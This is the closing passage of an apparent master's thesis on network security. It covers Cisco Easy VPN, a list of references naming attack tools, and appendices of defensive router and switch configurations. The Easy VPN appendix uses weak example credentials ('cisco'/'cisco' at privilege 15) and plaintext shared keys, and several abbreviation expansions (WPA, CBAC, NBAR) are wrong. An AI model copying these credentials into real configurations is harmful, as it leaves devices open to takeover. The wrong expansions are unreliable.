be entertained.

In order to connect to internet, they must have proper permission from the administrator. An

administrator can create a username and password entry in the router database and these

credentials should be provided in EASY VPN client, in order to connect to the internet. The

following screen shot presents the username and password challenge asked by the server.


39

Figure 13: Username and password challenge for EASY VPN client

At this point, a client must enter the correct credentials before accessing the internet. An

important point to note here is that after the client provides correct credentials, a client will see a

new virtual adapter with a new IP address. Now, this physical interface will be just used to keep

the connection alive but actual data forwarding will take place through virtual adapter. If a client

tries to spoof an IP through his physical interface then it will not be successful because the server

has no entry related to this IP address since he is no connected and an internet connected interface

will treat this packet as coming from other address, not local pool. The connection association,

data transfer till the connection tears down will be done through an encrypted session and

intruder, who is sitting in between the communication, will get this same result as demonstrated

above in telnet session.

6.7 Conclusion

It is always good practice to encrypt the data from local station to the server. As seen in the

demonstration above, an intruder was sitting between the two sites to capture data but due to

encryption he did not succeed. Also, it is necessary to allow only trusted sites inside your network

and block anything else. Since strictly blocking everything will hamper the normal functioning

of the network, CBAC can be used to cure this by allowing only trusted internally generated

traffic to find its way back in. This prevents uninvited traffic from entering the network. Allowing

or denying application by blocking certain ports is not a feasible option as many applications can

tunnel their way out using dynamic ports. NBAR can play a role in this regard as it either permits

or denies based on inspecting the packets. Finally, implementing EASY VPN server will give a

robust solution to the administrators to verify clients before letting them in or out of the network


40

7 Conclusion and future work In this thesis, we studied different ways of compromising the network and how to mitigate the

attacks. It is not only vital to know the holes and weakness in a network but also it will be handy

to know about attacking these holes. Attacking a network built gives us a better idea of how to

stop unwanted or malicious traffic entering the network.

There could be different methods that an attacker can use to compromise a network. It is not

useful to learn about all the threats theoretically but to use them and analyse the severity of these

threat is of major importance. We used many tools and techniques starting from wireless

networks to wired networks and found common attacks and then presented the strategy of how to

alleviate them.

Finally we carried out case studied catering to Layer 2 and Layer 3 security issues, implemented

the tools used for preventing such problems. We also recommended some approaches that may

prove helpful in certain circumstances.

This work can be further extended by taking layer 4 security threats in consideration. Since most

networks are facing the menace of viruses. Worms and Trojans, it is highly recommended to

further our work in this area.


41


42

8 Abbreviations

IPS Intrusion prevention system

IDS Intrusion Detection System

EAP Extended Authentication Protocol

EAPOL EAP over LAN

WEP Wired Equivalence Privacy

WPA Wifi Protected Appliances

SSL Secure Socket Layer

MAC Medium Access Control

DHCP Dynamic host configuration protocol

BPDU Bridge Protocol Data Unit

RIP Routing Information Protocol

CBAC Content Based Access System

VPN Virtual Private Network

NBAR Network Based Access Recognition


43


44

9 References

1. Houle, K.J. and Weaver, G.M (2001), “ Trends in Denial of Service Attack Technology”,

CERT and CERT Coordination Centre

2. Alfonsi, B.J.(2004), “E-voting advocates hold out hope”, IEEE Educational Activities

Department Piscataway, NJ, USA, Volume: 5 , Issue: 3, ISSN:1541-4922

3. Kong, H.S., Zhang, M.Q., Tang, J. and Luo, C.Y (2009), “The Research of Simulation

for Network Security Based on System Dynamics”, Information Engineering University.

Institute of Electronic Technology, Zhengzhou, China, IAS, vol. 2, pp.145-148

4. Warfield, M.H. (2003), “Security implication of IPv6”, Internet security system

5. “Church of Wifi WPA-PSK Rainbow Tables”, http://www.renderlab.net/projects/WPA-

tables/, 2010-02-07

6. CAM table overflow by Song, D. “dsniff”

7. “What Is Hacktivism? 2.0”, http://www.thehacktivist.com/, 2010-02-07

8. Simone, M. P. (2009), ”Perimeter Defences-in-Depth with Cisco ASA”, SANS Institute

Reading Room site

9. “An Easier Way to Deploy NAC”, Network Admission Control for 802.1x deployment

10. “coWPAtty MAIN”, Password cracking tool for wireless networks.

http://wirelessdefence.org/Contents/coWPAttyMain.htm 2010-02-07

11. “rinetd”, a tool for redirecting ports http://www.boutell.com/rinetd/ 2010-02-07

12. “PingOfDeath-Jolt.c”, Launching the ping of death attack.

http://infinityexists.com/downloads/PingOfDeath-Jolt.c 2010-02-07

13. “what is open VNP” http://openvpn.net/ 2010-02-07

14. Morgan, S. (2009),”Ethical Hacking – White Hat Hackers Top 1000 Despite Critics”

http://www.pressabout.com/ethical-hacking-white-hat-hackers-20696/ 2010-02-07

15. Grand, J. (2006), “Communications of the ACM”, SPECIAL ISSUE: Hacking and

innovation, ACM New York, NY, USA, pp: 44-49

16. Ferguson, P. and Huston,G. (1998), “What is a VPN?”, Whitepaper cisco systems and

Telstra Internet, Revision 1

17. Bittau, C.A., Handley, M and Lackey, J. (2006), “The Final Nail in WEP‟s Coffin”,

University college of London

18. “Ubuntu”, Linux distribution

http://ieeexplore.ieee.org/xpl/tocresult.jsp?isnumber=28687

http://www.renderlab.net/projects/WPA-tables/

http://www.renderlab.net/projects/WPA-tables/

http://www.thehacktivist.com/

http://wirelessdefence.org/Contents/coWPAttyMain.htm

http://www.boutell.com/rinetd/

http://infinityexists.com/downloads/PingOfDeath-Jolt.c

http://infinityexists.com/downloads/

http://infinityexists.com/downloads/

http://openvpn.net/

http://www.pressabout.com/ethical-hacking-white-hat-hackers-20696/

http://www.acm.org/publications


45

19. Naamany, A.M.A., Shidhani, A.A and Bourdoucen, H, (2006) “ IEEE 802.11 Wireless

LAN Security Overview”, IJCSNS International Journal of Computer 138 Science and

Network Security, vol.6 No.5B

20. “Cain & Abel”, tool for performing main in the middle attack.

21. “NG-0.7.3”, packet sniffing tool for Linux

22. “DOS”, script for denial of service attack. Invasion Power Board”

http://www.governmentsecurity.org/forum/index.php?showtopic=19131 2010-02-07

23. Savage, M. (2000), “Survey Shows Growing Losses From Cyber Crime”, CRN,

http://www.crn.com/security/18807629;jsessionid=02QZ4N4RWE20JQE1GHRSKH4AT

MY32JVN

24. “AIRCRACK-NG”, tool for cracking wireless networks.

25. “Securing WLANs: A Bluesocket Perspective on WPA and 802.1x solutions WPA and

802.11i” http://www.mobileinfo.com/PDF/WPAand80.pdf 2010-02-07

26. “Wires Shark, packet sniffing for windows.

27. “Cisco Easy VPN” http://www.cisco.com/en/US/products/sw/secursw/ps5299/index.html

2010-02-07

28. “2004 CSI/FBI Computer Crime and Security Survey”, Computer Security Institute

http://www.crime-research.org/news/11.06.2004/423/ 2010-02-07

29. Qu, Z.M. and Wang,X.L. (2009), “Digital Object Identifier”, Volume: 4, Business and

Information Management

30. “EC-Council”, Becoming Certified Ethical Hacker.

31. Ohigashi, T. and Morii, M. (2008) “A Practical Message Fasciations Attack on WPA”

IEEE explore

32. “vmware”, a tool for creating virtual machine

33. “nmap”, a tool for scanning active ports on the network

34. “Vomit - voice over misconfigured internet telephones”, a tool for copying IP telephony

conversation.

35. “The FreeRADIUS Project”, server for remote login authentication

36. Paul, B. (2001), “ Evaluation of security risks associated with networked information

systems”, RMIT University Business

37. Graham, R. (2007), “SideJacking with Hamster”, a tool for session hijacking

http://www.governmentsecurity.org/forum/index.php?showtopic=19131

Savage

http://www.crn.com/security/18807629;jsessionid=02QZ4N4RWE20JQE1GHRSKH4ATMY32JVN

http://www.crn.com/security/18807629;jsessionid=02QZ4N4RWE20JQE1GHRSKH4ATMY32JVN

http://www.mobileinfo.com/PDF/WPAand80.pdf

http://www.crime-research.org/news/11.06.2004/423/

http://erratasec.blogspot.com/2007/08/sidejacking-with-hamster_05.html


46

38. “CISCO RESPONSE TO DICTIONARY ATTACKS ON CISCO LEAP”, Cisco Systems

http://www.cisco.com/warp/public/cc/pd/witc/ao350ap/prodlit/2331_pp.pdf 2010-02-07

39. “Black Hat”, criminal hackers http://www.blackhat.com/ 2010-02-07

40. “IIS”, Web server for windows network

41. Kac, M.B. and Rindflesch, T.C. (1998), “Coordination in reconnaissance-attack parsing”,

Association for Computational Linguistics Morristown, NJ, USA

42. Rodman, J. (2008), “Audio Electronics and the „Mobile Phone Buzz‟”, POLYCOM

43. “PEAP-MS-CHAP v2”, Microsoft version of EAP for 802.1x authentication.

44. “DES/3DES/AES VPN Encryption Module (AIM-VPN/HPII, AIM-VPN/ BPII Family)” http://www.cisco.com/en/US/docs/ios/12_2/12_2z/12_2zj/

feature/guide/gtaimvpn.html 2010-02-07

45. “SMAC 2.0 MAC Address Changer”, a tool for changing MAC address in Windows

system

46. “Hping”, a tool for TCP SYN Flooding

47. “Cisco 7513/7576 Blower Module Replacement Instructions” http://www.cisco.com/en/US/products/hw/routers/ps359/prod_installation

_guide09186a00800fd155.html 2010-02-07

48. Otel, F.D.(2001), “ A layered approach to computer network security”, Technical Report

No. 369L, Department of Computer Engineering,Chalmers University of Technology

49. Harris, S., Harper, A., Eagle, C. and Ness, J. (2007) “Gray hat hacking

The ethical hacker‟s handbook”, Second edition, Library of Congress Cataloging-in-

Publication Data

50. Hakim, M.J., Azlan, J.Y. and Zuraidah,S. (2007), “A COMPARATIVE STUDY ON

“HARMFUL PHREAKING” VS “HARMLESS PHREAKING”, Palace Hotel, Bangkok

Thailand

51. “Kon-bot”, password recovery tool for Windows.

52. Watkins, M. and Wallance, K. “CCNA Security Official Exam Certification Guide”,

CCIE No. 7945

53. “Spanning Tree PortFast BPDU Guard Enhancement” Document ID: 10586, CISCO

http://www.cisco.com/en/US/tech/tk389/tk621/technologies_tech_note09186a008009482f

.shtml 2010-02-07

54. Hucaby, D. (2007), “CCNP Self-Study CCNP BCMSN Official Exam Certification

Guide” Fourth Edition, CCIE Press, No. 4594

http://www.cisco.com/warp/public/cc/pd/witc/ao350ap/prodlit/2331_pp.pdf%202010-02-07

http://www.blackhat.com/

http://www.cisco.com/en/US/docs/ios/12_2/12_2z/12_2zj/feature/guide/gtaimvpn.html

http://www.cisco.com/en/US/docs/ios/12_2/12_2z/12_2zj/feature/guide/gtaimvpn.html

http://www.cisco.com/en/US/products/hw/routers/ps359/prod_installation_guide09186a00800fd155.html

http://www.cisco.com/en/US/products/hw/routers/ps359/prod_installation_guide09186a00800fd155.html

http://www.cisco.com/en/US/tech/tk389/tk621/technologies_tech_note09186a008009482f.shtml

http://www.cisco.com/en/US/tech/tk389/tk621/technologies_tech_note09186a008009482f.shtml


47

55. “Cisco Response to Dictionary Attacks on Cisco”

http://www.cisco.com/en/US/products/hw/wireless/ps430/prod_bulletin09186a00801cc90

1.html 2010-02-07

56. “PEAP”, modified version of EAP. http://technet.microsoft.com/en-

us/library/cc757996(WS.10).aspx 2010-02-07

57. “HOW TO: Install Imported Certificates on a Web Server in Windows Server 2003”

http://support.microsoft.com/kb/816794 2010-02-07

58. “IAS as a RADIUS server design considerations” http://technet.microsoft.com/en-

us/library/cc757665(WS.10).aspx 2010-02-01

59. “Macfee”

http://www.mcafee.com/us/local_content/white_papers/wp_intruvertnextgenerationids.pdf 2010-

01-15

60. “Script kiddie” http://www.wordspy.com/words/scriptkiddie.asp 2010-02-07

61. “Nessus”, tool for security audit of the network. http://www.nessus.org/nessus/ 2010-02-

07

http://www.cisco.com/en/US/products/hw/wireless/ps430/prod_bulletin09186a00801cc901.html

http://www.cisco.com/en/US/products/hw/wireless/ps430/prod_bulletin09186a00801cc901.html

http://technet.microsoft.com/en-us/library/cc757996(WS.10).aspx


http://support.microsoft.com/kb/816794



http://www.mcafee.com/us/local_content/white_papers/wp_intruvertnextgenerationids.pdf

http://www.wordspy.com/words/scriptkiddie.asp

http://www.nessus.org/nessus/


48

10 Appendix Appendix A: Site to Site VPN

This configuration should exist on both routers. It should be exactly the same, otherwise

connection will not form.

crypto isakmp policy 10

authentication pre-share

enc aes

hash sha

group 5

crypto isakmp key 0 sharedsecret address <it should be IP of other side>

crypto ipsec transform-set mytrans esp-aes esp-sha-hmac

crypto map mymap 10 ipsec-isakmp

set peer <address of other side>

match address 101

set transform-set mytrans

interface fastethernet 0/1

ip address 192.168.2.1 255.255.255.0

crypto map mymap

access-list 101 permit ip <source network> <source network-mask> <destination network>

<destination network-mask>

Appendix B: Classic firewalls / CBAC

Check where to apply rules. Inside network will be allowed to reach outside network but outside

network will not be allowed to get inside the network.

First inspection rule is needed.

ip inspect name CBAC telnet

ip inspect name CBAC tcp

ip inspect name CBAC udp

ip inspect name CBAC icmp


ip inspect CBAC in

Next step is apply tough access list on outside interface.

access-list 101 deny ip any any


ip access-group 101 in

Appendix C: Protecting CAM Overflow

Note down the interfaces that are connected to clients. This configuration does not apply to Trunk

ports. Go to interface configuration mode and type the following commands.

Interface fastethernet 0/1

switchport mode access

switchport port-security

switchport port-security maximum 5


49

switchport port-security mac-address sticky

switchport port-security violation shutdown

Appendix D: Root Guard

Go into the interface configuration mode, where you want to apply the root guard and type the

following command.

spanning-tree guard root

Appendix E: BPDU Guard

spanning-tree bpduguard enable spanning-tree portfast

Appendix F: Disable Auto Negotiation

Check the interface, which are going to be trunk. Switch to switch are switch to router are called

trunk ports. Convert all these ports to trunk.

switchport mode trunk Convert non-trunk ports to access mode and make sure that no port is left in auto-negotiation

mode.


Appendix G: DHCP Snooping

In the global configuration mode, type the following to enable DHCP snooping.

ip dhcp snooping

Configure one port as trusted DHCP server and denies other ports.

ip dhcp snooping trust

Appendix H: Switch configuration for 802.1x

aaa-newmodel

aaa authentication dot1x login default group radius

radius-server host 192.168.1.2 key sharedsecret


dot1x port-control auto

Appendix I: Rapid Spanning Tree Protocol

spanning-tree mode rapid-pvst


spanning-tree portfast

Appendix J: Voice Vlan for IP Telephony

Configure one extra Vlan on the switch, which will be used by IP Telephony.


50

vlan 10

name voice

exit



switchport voice vlan 10

Appendix K: Limit CPU Process

Interface range fastethernet 0/1 – 0/15

Process cpu limit percent 30

Appendix L: NBAR

ip cef

class-map match-any P2P

match protocol bittorrent

match protocol gnutella

match protocol kazaa2

match protocol kerberos

policy-map P2P_BLOCK

class P2P

drop

interface FastEthernet0/0

service-policy input P2P_BLOCK

Appendix M: Implementing CISCO EASY VPN Server

hostname HQ

enable secret 5 $1$UTZY$Z8Q9MnjI2MwtnHahQfDIx1

aaa new-model

aaa authentication login VPNAUTH local

aaa authorization network VPNAUTH local

ip cef

username cisco privilege 15 password 0 cisco

crypto isakmp policy 10

encr aes

authentication pre-share

group 2

crypto isakmp key secretpass address 192.168.2.1

crypto isakmp client configuration group CISCOGROUP

key CISCOGROUP

pool VPNPOOL

max-logins 1

netmask 255.255.255.0

crypto ipsec transform-set mytrans esp-aes esp-sha-hmac

crypto dynamic-map mymap 10

set transform-set mytrans


51

reverse-route

crypto map mymap client authentication list VPNAUTH

crypto map mymap isakmp authorization list VPNAUTH

crypto map mymap client configuration address respond

crypto map mymap 10 ipsec-isakmp dynamic mymap

interface Loopback0

ip address 192.168.3.1 255.255.255.0

crypto map mymap


ip address dhcp

duplex auto

speed auto

ip access-group 150 out


interface GigabitEthernet1/0

ip address 192.168.2.3 255.255.255.0

negotiation auto

ip local pool VPNPOOL 10.1.1.1 10.1.1.100

ip route 0.0.0.0 0.0.0.0 192.168.0.1

access-list 150 permit ip 10.1.1.0 0.0.0.255 any

access-list 150 deny ip any any

Master’s Thesis in Network Engineering

Documents